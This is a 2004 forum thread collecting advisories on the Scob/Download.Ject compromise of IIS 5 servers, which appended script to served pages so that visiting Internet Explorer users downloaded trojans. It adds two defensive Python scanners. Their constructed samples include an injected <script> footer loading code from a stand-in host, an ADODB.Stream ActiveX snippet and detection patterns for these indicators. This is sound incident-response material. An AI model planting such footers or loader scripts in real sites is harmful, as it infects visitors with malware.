AplusWebMaster

IIS hacks???

7 posts in this topic

FYI...from the Internet Storm Center:

 

- http://isc.sans.org/diary.php?date=2004-06-24

Updated June 25th 2004 01:27 UTC

"RFI - Russian IIS Hacks?

UPDATE (2100 UTC) - Thanks to everybody who generously provided updates to us today. We still do not know how the IIS servers are originally infected with the JavaScript or the modification to the configuration files. Any additional theories or ideas are welcome.

The reason for the attack seems to point back to the spamming community. There is quite a bit of evidence that what we are seeing is yet another technique for spreading and installing "spamware" (software that assists in either creating, relaying, proxying, or otherwise participating in the sending of spam.) We don't see any evidence that this attack is related to the construction of a DDoS network or other type of typical zombie-based attack group. However, we continue to monitor and will provide updates if anything further develops...

[original diary entry follows]

A reader pointed us to an IIS discussion group (microsoft.public.inetserver.iis.security ***) where several IIS administrators discovered some strange .dll files on their web servers in the past 24 hours. According to the discussion on that list, they are all 1kb .dll files. They were deposited in the \winnt\system32\inetsrv directory with names like iis7xy.dll where x is a random number that appears to be between 1-3 and y is a random character or number...

The Storm Center would like to know if others are seeing this phenomenon and if there are any ideas about its origin or intent (other than being an attempt to download malware - that's obvious.) The IP address in the JavaScript points to a Russian site, and at the time of this writing it is still active. A note of caution - that site will attempt to insert malicious code onto a visiting machine. Use extreme caution if you decide to visit it."

 

Also (may be related) >>> Corporate Web servers infecting visitors' PCs

- http://news.com.com/2102-7349_3-5247187.ht...g=st.util.print

June 24, 2004, 6:35 PM PDT

"...The Internet Storm Center, which monitors Net threats, confirmed that the list of infected sites included some large Web properties. "We won't list the sites that are reported to be infected in order to prevent further abuse, but the list is long and includes businesses that we presume would normally be keeping their sites fully patched," the group stated on its Web site. The group also pointed out that the malicious program uploaded to a victim's computer is not currently detected as a virus by most antivirus software. With no patch from Microsoft, that leaves Internet Explorer users vulnerable. A representative of the software giant was not immediately available for comment on when a patch might be available..."

 

***

- http://www.microsoft.com/technet/community...y&lang=en&cr=US

Edited by apluswebmaster


FYI...

 

IIS 5 Web Server Compromises

- http://www.us-cert.gov/current/current_activity.html#iis5

added June 24

"US-CERT is aware of new activity affecting compromised web sites running Microsoft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites. Compromised sites are appending JavaScript to the bottom of web pages. When executed, this JavaScript attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system. US-CERT is investigating the origin of the IIS 5 compromises and the impact of the code that is downloaded to end-user systems.

- Web server administrators running IIS 5 should verify that there is no unusual JavaScript appended to the bottom of pages delivered by their web server.

- This activity is another example of why end users must exercise caution when JavaScript is enabled in their web browser. Disabling JavaScript will prevent this activity from affecting an end-user's system, but may also degrade the appearance and functionality of some web sites that rely upon JavaScript. US-CERT recommends that end-users disable JavaScript unless it is absolutely necessary. Users should be aware that any web site, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code..."

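Two of the symptoms in the posts above can be checked from the outside: the ISC diary describes 1 KB files named iis7xy.dll dropped into \winnt\system32\inetsrv, and US-CERT asks IIS 5 administrators to verify that no unusual JavaScript is appended to the bottom of pages their server delivers. The script below is an added example (it is not from the posts, ISC, US-CERT or any vendor) that does both checks over constructed input: it looks for script content that sits after a page's own closing </html> tag, which is where a server-side footer lands, pulls out any external hosts it references, and flags the ADODB.Stream/ActiveXObject strings the later posts associate with the IE download technique. The sample pages, the 192.0.2.10 documentation address and the directory listing are all constructed.

```python
"""Checks for the symptoms described above: script appended after </html> in
served pages and the 1 KB iis7xy.dll files in \\winnt\\system32\\inetsrv.
Added example, not from the posts or any vendor; all sample data is constructed."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)
# Strings tied to the IE ADODB.Stream download technique the posts mention.
IOC_TOKENS = ("ADODB.Stream", "ActiveXObject")
# Name pattern from the ISC diary: iis7xy.dll, x in 1-3, y a digit or letter.
DLL_RE = re.compile(r"^iis7[1-3][0-9a-z]\.dll$", re.I)


@dataclass
class PageFinding:
    has_closing_html: bool
    scripts_after_html: int
    external_hosts: List[str]
    ioc_hits: List[str]

    @property
    def suspicious(self) -> bool:
        return self.scripts_after_html > 0 or bool(self.ioc_hits)


def scan_page(body: str, own_hosts: Iterable[str] = ()) -> PageFinding:
    """Flag script content sitting after the last </html> and known IoC strings.

    A footer appended by the web server lands after the page's own closing
    tag, so anything non-trivial there is a red flag regardless of how the
    page itself was written.
    """
    idx = body.lower().rfind("</html>")
    has_closing = idx != -1
    trailer = body[idx + len("</html>"):] if has_closing else ""
    scripts = SCRIPT_RE.findall(trailer)
    hosts = {h.lower() for h in HOST_RE.findall(trailer)} - {h.lower() for h in own_hosts}
    ioc = [tok for tok in IOC_TOKENS if tok in body]
    return PageFinding(has_closing, len(scripts), sorted(hosts), ioc)


def suspicious_inetsrv_files(listing: Iterable[Tuple[str, int]]) -> List[str]:
    """Return names from a (filename, size_bytes) listing that match the
    reported iis7xy.dll pattern and are about 1 KB like the ones observed."""
    return sorted(name for name, size in listing if DLL_RE.match(name) and size <= 2048)


# --- constructed samples (192.0.2.10 is a documentation address) ---
CLEAN_PAGE = "<html><head><title>Store</title></head><body><p>Welcome</p></body></html>\r\n"
FOOTER_PAGE = CLEAN_PAGE + '<script language="JavaScript" src="http://192.0.2.10/load.js"></script>\r\n'
INLINE_PAGE = CLEAN_PAGE + '<script language="JavaScript">var s = new ActiveXObject("ADODB.Stream");</script>\r\n'
SAMPLE_LISTING = [
    ("asp.dll", 340000), ("inetinfo.exe", 15000),
    ("iis71a.dll", 1024), ("iis73f.dll", 1097), ("iis7a1.dll", 1024),
]

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("footer", FOOTER_PAGE), ("inline", INLINE_PAGE)):
        print(label, scan_page(page, own_hosts={"www.example.com"}))
    print(suspicious_inetsrv_files(SAMPLE_LISTING))
```

In practice the body passed to scan_page would come from fetching a sample of your own site's pages (static HTML as well as dynamic ones, since the footer is applied to everything the server delivers), and the listing from the inetsrv directory on each web server. Pass the hostnames you legitimately load script from in own_hosts so that only unknown hosts are reported.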

FYI...from the Internet Storm Center:

 

Compromised Web Sites Infect Web Surfers

- http://isc.sans.org/diary.php?date=2004-06-25

Updated June 25th 2004 14:11 UTC

"...A large number of web sites, some of them quite popular, were compromised earlier this week to distribute malicious code. The attacker uploaded a small file with javascript to infected web sites, and altered the web server configuration to append the script to all files served by the web server. The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.

- If a user visited an infected site, the javascript delivered by the site would instruct the user's browser to download an executable from a Russian web site and install it. Different executables were observed. These trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system.

- The javascript uses a so far unpatched vulnerability in MSIE to download and execute the code. No warning will be displayed. The user does not have to click on any links. Just visiting an infected site will trigger the exploit..."

 

>>> For further information, visit the URL in this post, and there -is- a lot more.

 

:(


More info:

 

- http://www.f-secure.com/weblog/

00:56 GMT

"...We are investigating a case called "RFI - Russian IIS Hacks?"...

 

12:04 GMT

"...Microsoft published an update on the Scob (aka Download.Ject) case..."

 

>>> http://www.microsoft.com/security/incident...nload_ject.mspx

Updated June 25, 2004 12:35 A.M. Pacific Time

"Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows..."

 

(For more information, visit the MS URL in this post --^, and there -is- a lot more)


FYI...

 

- http://isc.sans.org/diary.php?date=2004-06-25

Compromised Web Sites Infect Web Surfers

(for more details, also see yesterday's diary:

- http://isc.sans.org/diary.php?date=2004-06-24 )

"UPDATE 17:26 UTC Jan 25 2004

LURHQ published a detailed analysis of the "Berbew" trojan downloaded by this exploit. According to this analysis, the trojan will capture passwords as users log into given e-commerce, bank or auction web sites..."

 

- http://www.lurhq.com/berbew.html

June 25, 2004

"...The trojan is installed via the ADODB/javascript redirection exploit for Internet Explorer for which there is no current patch. When a user visits an infected IIS server using IE, the trojan will be downloaded from a Russian webserver and executed in the background...The trojan appears to be designed for the purposes of "phishing", that is, stealing financial and other account details from the infected user..."


FYI...

 

-aka-

JS.Scob.Trojan

- http://www.sarc.com/avcenter/venc/data/js.scob.trojan.html

"...The Trojan's dropper sets it as the document footer for all pages served by IIS Web sites on the infected computer..."

(FYI...reference graphic image shown)

 

 


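The ISC update quoted earlier says the attacker "altered the web server configuration to append the script to all files served", and the Symantec write-up above names the mechanism: the dropper sets the script as the document footer for every IIS site on the machine. That makes the footer setting itself the thing to audit on the server, independently of what the pages look like from outside. The following is an added example, not code from the posts, Symantec or Microsoft: it parses a property dump of the kind adsutil.vbs prints for a site and reports whether a document footer is enabled, what it points to, and whether that footer injects <script>. The metabase property names EnableDocFooter and DefaultDocFooter, the "Name : (TYPE) value" line layout and the FILE:/STRING: value prefixes are assumptions about IIS 5/6, and the dump text, file path and footer contents are constructed.

```python
"""Audit an IIS site's document-footer settings for an injected script footer.
Added example; the metabase property names EnableDocFooter / DefaultDocFooter,
the adsutil.vbs-style 'Name : (TYPE) value' layout and the FILE:/STRING: prefix
convention are assumptions, and every input below is constructed."""
import re
from typing import Callable, Dict, Optional

LINE_RE = re.compile(r"^\s*(\w+)\s*:\s*\((\w+)\)\s*(.*?)\s*$")
FOOTER_RE = re.compile(r"^(FILE|STRING):(.*)$", re.I | re.S)
# The reported dropper parks the footer as a fake .dll under inetsrv.
INETSRV_DLL_RE = re.compile(r"\\inetsrv\\[^\\]+\.dll$", re.I)


def parse_adsutil(output: str) -> Dict[str, str]:
    """Turn 'Name : (TYPE) value' lines into a dict, dropping surrounding quotes."""
    props: Dict[str, str] = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            name, _type, value = m.groups()
            props[name] = value.strip('"')
    return props


def audit_footer(output: str, read_file: Callable[[str], Optional[str]]) -> dict:
    """Report whether a document footer is enabled, what it points at, and
    whether it injects <script>. read_file maps a path to its text or None."""
    props = parse_adsutil(output)
    enabled = props.get("EnableDocFooter", "").lower() == "true"
    raw = props.get("DefaultDocFooter", "")
    report = {"enabled": enabled, "kind": None, "target": raw,
              "contains_script": False, "reasons": []}
    if not enabled or not raw:
        return report
    m = FOOTER_RE.match(raw)
    kind, target = (m.group(1).upper(), m.group(2)) if m else ("STRING", raw)
    report["kind"], report["target"] = kind, target
    # A FILE: footer is read from disk; a STRING: footer is the text itself.
    content = read_file(target) if kind == "FILE" else target
    if content is None:
        report["reasons"].append("footer file missing or unreadable: " + target)
    elif "<script" in content.lower():
        report["contains_script"] = True
        report["reasons"].append("footer injects <script>")
    if kind == "FILE" and INETSRV_DLL_RE.search(target):
        report["reasons"].append("footer file is a .dll under inetsrv")
    return report


# --- constructed adsutil.vbs-style output and footer file contents ---
CLEAN_SITE = r"""
KeyType                         : (STRING) "IIsWebServer"
ServerComment                   : (STRING) "Default Web Site"
EnableDocFooter                 : (BOOLEAN) False
"""
INFECTED_SITE = r"""
KeyType                         : (STRING) "IIsWebServer"
ServerComment                   : (STRING) "Default Web Site"
EnableDocFooter                 : (BOOLEAN) True
DefaultDocFooter                : (STRING) "FILE:C:\WINNT\system32\inetsrv\iis71a.dll"
"""
FOOTER_FILES = {
    r"C:\WINNT\system32\inetsrv\iis71a.dll":
        '<script language="JavaScript" src="http://192.0.2.10/load.js"></script>',
}

if __name__ == "__main__":
    print(audit_footer(CLEAN_SITE, FOOTER_FILES.get))
    print(audit_footer(INFECTED_SITE, FOOTER_FILES.get))
```

On a live server you would feed audit_footer the property dump for each site and virtual directory (the footer can be set per node, not only at the server level) and a read_file that opens the path on disk; any enabled footer you did not configure yourself is worth treating as a compromise indicator even before looking at its contents.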

Correction:

 

Although related (possibly same author and target), the JS.Scob.Trojan and the Berbew trojan are two different items of malware:

 

JS.Scob.Trojan

- http://www.sarc.com/avcenter/venc/data/js.scob.trojan.html

 

This is but one of several Berbew variants:

- http://www.sarc.com/avcenter/venc/data/bac...r.berbew.g.html

 

